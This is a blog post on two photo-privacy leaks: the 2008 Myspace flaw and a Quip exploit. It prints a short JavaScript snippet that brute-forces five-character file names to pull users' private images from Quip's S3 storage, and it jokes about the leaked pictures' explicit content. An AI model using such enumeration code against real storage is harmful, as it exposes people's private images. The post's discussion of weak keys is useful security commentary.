Data Insecurity

It always amazes me to see how people put trust in their service providers. While in principle, there’s no real need to worry, careless implementation of services can really have dire consequences!

And it’s not like leaks and exploits are rare. Sometimes we hear about them, sometimes we don’t. Let’s consider these two (amongst those) I know about:

The 2008 Myspace Leak. In January 2008, a flaw in Myspace’s programming allowed bad guys (let us call them like that, although it’s entirely debatable, in the end) to download hundreds of thousands private pictures from Myspace. (Original story here, and from /.). So about 44,000 users got their private pictures scraped off and seeded to some torrent.

I don’t know, however, if only the pictures were downloaded. Maybe information contained on the private pages was accessed and copied as well. I hope nobody had critical information there.

The Quip Exploit. Quip (dead for now?) used to offer an “image texting service” as an app for the iPhone but was slayed by Apple (apparently, I speculate, but its removal from the AppStore isn’t a coincidence, I’m sure) when it was made public that they used Amazon’s S3 as temporary buffer in a rather careless way. While you could not list the contents of the directory, you could brute-force the—too short—file names and still get images out with a high success rate—several per minute.

The Quip service used 5 alphanumeric symbols as a rather weak hash function in a rather careless frobnication of file names. A short javascript code trying random keys extracted lots of images in a short time:

function found() {
    $("#save").prepend("<a target='_new' href='http://pic.quiptxt.com/"
    +id+
    "'><img src='http://quipimg.s3.amazonaws.com/"
    + id
    + ".jpg'
    title='"+id+"' /></a> ");
    randquip();
  }

  function randquip() {
    var letters = new Array("a", "b", "c", "d",
        "e", "f", "g", "h", "i", "j", "k", "l",
        "m", "n", "o", "p", "q", "r", "s", "t",
        "u", "v", "w", "x", "y", "z", "1", "2",
        "3", "4", "5", "6", "7", "8", "9", "0" );
    var r1 = Math.floor(Math.random() * letters.length);
    var r2 = Math.floor(Math.random() * letters.length);
    var r3 = Math.floor(Math.random() * letters.length);
    var r4 = Math.floor(Math.random() * letters.length);
    var r5 = Math.floor(Math.random() * letters.length);

    id = letters[r1] + letters[r2] + letters[r3] + letters[r4]+ letters[r5];
    $("#quip").attr("src", "http://quipimg.s3.amazonaws.com/" + id + ".jpg");
    $("#info").html("<b>" + id + "</b>");
  }

(a code snippet from fang.) So we’re not talking about breaking encryption here. Just random poking in the dark!

*
* *

While I think the coders from Myspace were careful but still got hacked; the guys from Quip have been quite careless about how their customers’ images were stored. Well, maybe not quite all that careless. Examining the images from the Quip exploit, we see that they were stripped of all meta-data after being resized to standard resolution. No comments, no EXIF, nothing from the original iPhone that could help baddies trace the pictures to their original owners. The problem is that the pictures exchanged by their users were also rather careless. Fast examination of the pictures shows a BDOW1 index of 0.075, which is rather high and, well, embarrassing for their users.

Already if they’d used a wider key, say, the MD5 of the picture, the Fang exploit would’nt have been possible and Quip’d still be in business (at least at the time of writing, they seem quite dead; maybe they’ll make a come-back with lessons learnt).

*
* *

So there are two lessons here. One, don’t send pictures of your genitalia, or, if you do, use some protection—such as strong encryption with keys pre-shared with the intended receiver. Just don’t trust your provider for being extra careful with your private partsdata; they may goof up, even if no evil was intended.

The second lesson here is that if you’re a provider, you must take all possible care to prevent bad guys from breaking in and exploiting your users’ private information. At least, the Quip guys tried: they stripped all meta-data from the files themselves, so there’s little chance, if you don’t know the people on the picture, that you can trace them back. But they also erred in thinking that their storage strategy was “safe” through obscurity. Expect the Huns… and, while you’re at it, the Spanish Inquisition.

*
* *

I also want to make clear that I have nothing to do with either exploit; I learnt about the Quip exploit by chance, while on IRC. But you know how it is… you spray eye bleach in your face but …somehow …can’t …look …away.


1 The Boob-Dick-Orifice-or-Worse Index. The number of boobs, dicks, orifices (or worse) pictures divided by the total number of pictures.

3 Responses to Data Insecurity

  1. [...] the rest here:  Data Insecurity « Harder, Better, Faster, Stronger No Related Post View the Contact Powered by [...]

  2. Nicolas A. Bérard-Nault says:

    Even though that Quip exploit didn’t last for long, it was a lot of fun, just sitting in front of your screen peeking into the secret lives of random people.

    I must say I was quite fascinated by such a high BDOW index.

  3. [...] a relatively small part of the key changes between calls. As I’ve said before, using slow- or little-varying keys is just begging to get hacked. Not sure how realistic it is to [...]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 74 other followers

%d bloggers like this: